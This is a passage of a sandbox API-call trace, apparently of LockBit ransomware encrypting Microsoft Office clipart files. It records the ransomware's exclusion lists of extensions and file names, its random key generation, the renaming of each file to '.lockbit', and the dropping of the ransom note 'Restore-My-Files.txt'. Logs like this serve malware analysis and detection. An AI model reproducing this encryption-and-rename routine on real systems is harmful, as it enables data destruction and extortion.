-1 [0149.220] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.221] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.222] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.222] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187849.WMF") returned 1 [0149.223] lstrcmpiW (lpString1="ntldr", lpString2="J0187849.WMF") returned 1 [0149.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187849.WMF") returned 1 [0149.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187849.WMF") returned -1 [0149.223] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187849.WMF") returned -1 [0149.223] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187849.WMF") returned 1 [0149.224] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187849.WMF") returned -1 [0149.224] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.224] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF") returned=".WMF" [0149.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.224] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.224] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.225] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.225] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF.lockbit") returned 72 [0149.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187849.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0149.227] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.227] malloc (_Size=0x40068) returned 0x1ff1e60 [0149.227] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7572) returned 1 [0149.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0149.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0149.229] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0149.234] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.234] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.235] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.237] free (_Block=0x1fa2ed8) [0149.237] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187849.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.237] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.237] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x221c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187851.WMF", cAlternateFileName="")) returned 1 [0149.238] lstrcmpiW (lpString1=".", lpString2="J0187851.WMF") returned -1 [0149.238] lstrcmpiW (lpString1="..", lpString2="J0187851.WMF") returned -1 [0149.238] PathFindExtensionW (pszPath="J0187851.WMF") returned=".WMF" [0149.238] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.238] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.239] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.240] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.240] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187851.WMF") returned 1 [0149.241] lstrcmpiW (lpString1="ntldr", lpString2="J0187851.WMF") returned 1 [0149.241] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187851.WMF") returned 1 [0149.241] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187851.WMF") returned -1 [0149.241] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187851.WMF") returned -1 [0149.241] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187851.WMF") returned 1 [0149.241] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187851.WMF") returned -1 [0149.241] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.241] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF") returned=".WMF" [0149.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.241] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.241] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.242] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.245] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.246] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.246] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.246] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.246] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.246] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF.lockbit") returned 72 [0149.246] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187851.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0149.247] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.247] malloc (_Size=0x40068) returned 0x3d70450 [0149.247] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8732) returned 1 [0149.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0149.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0149.249] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0149.254] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.254] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.254] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.256] free (_Block=0x1fa2ed8) [0149.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187851.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.256] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.256] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.256] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187859.WMF", cAlternateFileName="")) returned 1 [0149.256] lstrcmpiW (lpString1=".", lpString2="J0187859.WMF") returned -1 [0149.256] lstrcmpiW (lpString1="..", lpString2="J0187859.WMF") returned -1 [0149.256] PathFindExtensionW (pszPath="J0187859.WMF") returned=".WMF" [0149.256] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.256] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.256] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.256] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.256] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.256] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.257] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.258] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.258] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187859.WMF") returned 1 [0149.258] lstrcmpiW (lpString1="ntldr", lpString2="J0187859.WMF") returned 1 [0149.258] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187859.WMF") returned 1 [0149.259] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187859.WMF") returned -1 [0149.259] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187859.WMF") returned -1 [0149.259] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187859.WMF") returned 1 [0149.259] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187859.WMF") returned -1 [0149.259] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.259] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF") returned=".WMF" [0149.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.259] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.259] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.260] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.260] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF.lockbit") returned 72 [0149.260] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program 